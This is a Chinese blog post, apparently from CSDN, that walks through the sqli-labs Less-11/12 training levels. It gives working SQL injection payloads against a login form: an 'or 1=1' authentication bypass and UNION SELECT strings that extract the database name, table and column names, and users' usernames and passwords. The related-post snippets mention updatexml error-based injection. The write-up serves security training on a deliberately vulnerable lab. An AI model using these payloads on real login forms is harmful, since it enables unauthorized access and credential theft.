sqli-labs Less-11/Less-12 POST Error Based

最新推荐文章于 2024-06-15 16:09:53 发布
最新推荐文章于 2024-06-15 16:09:53 发布
阅读量150 收藏
点赞数
分类专栏: SQL注入 文章标签: mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bigblue00/article/details/106815052
版权

Less-11/Less-12 POST Error Based

POST方式基于错误的注入
查看页面情况,发现是一个登陆表单
随便输入一些内容,点击submit后,有login attempt failed的提示图片,
在这里插入图片描述
尝试成能密码登陆 or 1=1 – + 在这里插入图片描述
在这里插入图片描述
提示登陆成功,并出现用户名和密码信息。
接下来构造语句,获取数据库信息
123’ union select 1,2,3 – + 在这里插入图片描述
提示查询列数不对,减少一列尝试一下
123’ union select 1,2 – +
在这里插入图片描述
提示登陆成功,并给出了显示位置。
获取数据库名
123’ union select 1,database() – +
在这里插入图片描述
然后可以通过以下语句获取更多信息,可以根据实际情况适当调整语句参数
获取表名语句
123’ union select 1,table_name from information_schema.tables where table_schema=“security” limit 3,1 – +
获取列名语句
123’ union select 1,column_name from information_schema.columns where table_schema=“security” and table_name=“users” limit 1,1 – +
获取用户信息语句
123’ union select username,password from users limit 1,1 – +
在这里插入图片描述

远行01
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs less-11 & less-12
water0diamond的博客
03-17 901
POST-Error Based-Single quotes-String (基于错误的POST单引号字符型注入) Less-11 POST-Error Based-Double quotes-String-with twist (基于错误的双引号POST型字符型变形的注入)Less-12 前面10关都是get型的,而从现在开始我们进入post型关卡 post是一种数据提...
sqli-labs】 less11 POST - Error Based - Single quotes- String (基于错误的POST单引号字符型注入)...
ajxi63204的博客
01-20 191
查看源码,用户名和密码通过post提交 加单引号提交 出现报错,推测对应的SQL语句 select ... from ... where xxx=''' and yyy='123' limit 0,1 直接使用or构造永真登录 成功,注意此处登录的用户为表中的第一个用户 需要改变用户可以通过改变筛选条件实现 作为表中的第二个用户登录 ...
sqli-labs less 12 POST -Error Based - Double quotes -String -with twist
Monster1m的博客
01-19 201
一、bp开启拦截,打开十二关点击submit,bp收到拦截的报文 二、send to repeater,然后打开repeater模块 三、先输入单引号发现页面没错误,然后输入双引号发现有错误信息,可以考虑使用报错注入 四、既然双引号报错了,然后添加注释符发现还是报错,再添加一个括号,页面显示正常,则闭合方式为") uname=1")#&passwd=&submit=Submit 五、先来判断当前数据库 uname=1") and updatexml(1,concat('^',data
Sqli-labs靶场详细攻略Less 11-16
qq_41755084的博客
10-11 603
这一关页面发生了变化,开始使用post方法传递参数。在Username字段输入1',查看错误信息。错误信息中发现password字段,基本可以确认这两个字段在同一个sql语句中联合查询。使用order by注入测试返回的参数为几列。测试到3时报错,证明返回两列。注意,这里的注释使用的是--(两个减号一个空格),而不是之前的--+。之前也提到使用加号是因为在某些http实现时会将加号转变为空格。这里使用#进行注释也是一样的。使用union select注入查询数据库名,数据库中表名。
sqli-labs通关全解---POST提交方式--less11-16-5
cyynid的博客
01-11 300
POST提交
sqli-labs less 17 POST -Update Query- Error Based -String
Monster1m的博客
01-21 149
一、这一把好像直接看不出什么,就来分析源码吧 1.找到下面两行,发现uname在赋值时使用了一个check_input函数,先来找到这个函数是干什么的 2.找到check_input函数,发现是使用了一些函数对输入的值进行检查。所以现在uname被进行了过滤,但是发现passwd没有使用check-input进行检查,所以重点放在passwd上 3.然后找到两句数据库语句,发现update语句里有用到passwd,并且是单引号闭合,至此找到了注入点。但是由于先用uname进行了select查询,所以我们
sqli-labs:less-21
羽的博客
09-10 171
和20题很像。 然后一看cookie是一个base64编码的,解码一下,是Dumb。 所以cookie一个是注入点,只是有个base64编码 随便提一下: base32 只有大写字母和数字数字组成,或者后面有三个等号。 base64 只有大写字母和数字,小写字母组成,后面一般是两个等号。 这样也就是要将原来的注入语句进行base64编码以后在放到cookie中进行注入。 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 T...
sqli-labs通关(less1~less10)
热门推荐
箭雨镜屋
08-16 1万+
这10关都是GET型的,包括了union注入、报错注入、布尔盲注和时间盲注,虽然包含了几种闭合方式,但是没有涉及到过滤和绕过,是最基础的关卡。
sqli-labs通关全解---有关请求头注入--less18-22--7
cyynid的博客
01-12 391
Accept: application/json 浏览器可以接受服务器回发的类型为 application/json。Accept: */* 代表浏览器可以处理所有类型,(一般浏览器发给服务器都是发这个)。Accept-Encoding: gzip, deflate 浏览器申明自己接收的编码方法,通常指定压缩方法,是否支持压缩,支持什么压缩方法(gzip,deflate),(注意:这不是只字符编码)。q=0.9 浏览器申明自己接收的语言。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
mysql-线上常用运维sql-2
jll126的博客
06-11 454
MySQL中,直接查询当前正在执行的事务可能不是非常直观,因为MySQL并没有提供直接的命令或系统视图来列出所有正在运行的事务。但是,你可以通过几种方法间接地获取这些信息。
MySQL】(基础篇十二) —— 子查询
最新发布
dao_cao_renshuai的博客
06-15 348
本文介绍什么是子查询以及如何使用它们。
MySQL】索引(上)
开心星人的博客
06-11 826
索引是一种用于快速查询和检索数据的数据结构,排序好的数据结构。 优点:加快检索速度;通过创建唯一性索引,可以保证行数据的唯一性;通过索引列对数据进行排序,降低数据排序的成本,降低CPU的消耗 缺点:创建和维护索引需要耗费时间,本身存储也要耗费一定空间不同引擎对索引的支持情况 哈希表、有序数组、B+树、B树、红黑树,二叉树哈希表:只适用于等值查询的场景,用这种索引做不了范围查询,必须全表扫描。查询效率高有序数组:有序数组在等值查询和范围查询场景中的性能就都非常优秀,但是一旦更新数据就得挪动后面的元素,成本太高
深入解析MySQL的层次化设计
m0_66404702的博客
06-14 1095
2、如果是 prepare 状态,检查 binlog 记录的对应事务操作(redo log 与 binlog 记录的事务操作有一个共同字段 XID,redo log 就是通过这个字段找到 binlog 中对应的事务的)是否完整(这点在前面 binlog 三种格式分析过,每种格式记录的事务结尾都有特定的标识),如果完整就将 redo log 设为 commit 状态,然后结束;6、如果表更改,则使用该表的所有高速缓存查询都变为无效并从缓存中删除,这包括使用 MERGE 映射到已更改表的表的查询。
sqli-labs less
07-28
抱歉,我无法回答关于sqli-labs less的问题。 #### 引用[.reference_title] - *1* *2* *3* [sqli-labs教程——Less 1-10](https://blog.csdn.net/qq_25649867/article/details/111020393)[target="_blank" data-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值